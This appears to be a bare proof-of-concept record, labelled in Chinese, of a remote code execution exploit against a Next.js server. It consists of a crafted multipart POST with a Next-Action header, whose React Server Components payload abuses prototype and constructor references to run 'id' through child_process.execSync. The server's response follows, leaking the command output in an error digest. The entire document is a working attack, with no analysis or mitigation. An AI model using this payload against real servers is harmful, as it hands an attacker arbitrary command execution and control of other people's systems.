payload：

POST /apps HTTP/1.1
Host: 192.168.1.7:8088
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Next-Action: x
Content-Length: 564
Content-Type: multipart/form-data; boundary=c4d0d23a5a6bf26ca64a34dbbbfeea61

--c4d0d23a5a6bf26ca64a34dbbbfeea61
Content-Disposition: form-data; name="0"

{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B0\"}", "_response": {"_prefix": "var res = process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});", "_formData": {"get": "$1:constructor:constructor"}}}
--c4d0d23a5a6bf26ca64a34dbbbfeea61
Content-Disposition: form-data; name="1"

"$@0"
--c4d0d23a5a6bf26ca64a34dbbbfeea61--

回显:

HTTP/1.1 500 Internal Server Error
Server: nginx/1.29.1
Date: Sat, 13 Dec 2025 13:41:32 GMT
Content-Type: text/x-component
Connection: close
x-frame-options: DENY
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Powered-By: Next.js
Content-Length: 101

0:{"a":"$@1","f":"","b":"dL16GVQTztB86xZALFIv7"}
1:E{"digest":"uid=1001 gid=0(root) groups=0(root)"}